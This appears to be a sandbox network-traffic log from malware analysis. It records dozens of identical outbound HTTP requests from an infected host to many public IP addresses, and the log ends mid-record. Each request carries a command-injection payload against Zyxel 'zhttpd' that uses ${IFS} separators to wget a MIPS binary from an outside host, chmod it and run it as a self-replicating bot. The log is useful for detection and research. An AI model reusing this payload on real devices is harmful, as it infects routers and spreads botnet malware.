                                                  Jan 19, 2024 18:24:03.194356918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6205192.168.2.1342124183.53.95.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194392920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6206192.168.2.1334698180.190.167.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194433928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6207192.168.2.134804425.118.42.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194467068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6208192.168.2.133590472.6.84.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194494009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6209192.168.2.1343236204.170.213.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194547892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6210192.168.2.136033043.160.224.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194587946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6211192.168.2.1353078110.117.126.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194643974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6212192.168.2.133349219.59.188.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194672108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6213192.168.2.1357126194.239.102.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194710016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6214192.168.2.1337018123.32.213.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194741011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6215192.168.2.1344512208.93.108.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194787025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6216192.168.2.13466385.181.115.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194830894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6217192.168.2.1341804179.48.29.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194861889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6218192.168.2.135574266.35.132.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194894075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6219192.168.2.135951857.61.190.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194911003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6220192.168.2.134176071.186.196.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.194946051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6221192.168.2.1360224217.179.38.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195013046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6222192.168.2.135106260.127.3.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195049047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6223192.168.2.13346288.229.254.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195080042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6224192.168.2.135531687.162.10.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195123911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6225192.168.2.1342046131.204.156.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195163965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6226192.168.2.1350256119.88.211.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195190907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6227192.168.2.1355190126.87.1.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195242882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6228192.168.2.1333804134.52.228.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195272923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6229192.168.2.1353032153.160.70.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195326090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6230192.168.2.1333900129.251.148.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195353031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6231192.168.2.133669091.230.82.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195415020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6232192.168.2.1360904172.254.9.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195453882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6233192.168.2.1358756135.80.156.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195488930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6234192.168.2.136046238.253.242.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195528030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6235192.168.2.1356968154.216.241.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195590973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6236192.168.2.1346438193.2.1.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195621967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6237192.168.2.1358516197.222.198.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195689917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6238192.168.2.134371890.127.248.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195694923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6239192.168.2.135558882.11.8.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195760965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6240192.168.2.1349864197.214.202.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195786953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6241192.168.2.133499625.67.120.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195807934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6242192.168.2.1349684115.61.43.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195863008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6243192.168.2.134536443.128.7.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195908070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6244192.168.2.1344332198.194.216.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195943117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6245192.168.2.134982245.48.236.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.195995092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6246192.168.2.135040035.230.120.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196022987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6247192.168.2.134565695.213.248.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196072102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6248192.168.2.1334916103.160.172.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196104050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6249192.168.2.1360200180.177.191.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196144104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6250192.168.2.1333752109.81.186.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196208000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6251192.168.2.135448886.50.187.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196247101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6252192.168.2.1332796186.30.69.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196291924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6253192.168.2.1349796126.172.149.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196331978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6254192.168.2.1342832181.34.219.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196376085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6255192.168.2.1342628115.116.54.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196415901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6256192.168.2.1344396195.67.38.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196458101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6257192.168.2.1344504145.234.157.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196484089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6258192.168.2.135119681.99.192.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196508884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6259192.168.2.1335118138.230.161.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196542978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6260192.168.2.134491813.67.101.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196573973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6261192.168.2.1356268158.73.9.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196631908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6262192.168.2.134521088.184.205.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196666002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6263192.168.2.1343330154.202.5.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196708918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6264192.168.2.1344938198.228.80.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196736097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6265192.168.2.134872835.252.60.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196778059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6266192.168.2.1340478212.14.217.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:03.196801901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6267192.168.2.135033096.117.246.79443
                                                  TimestampBytes transferredDirectionData
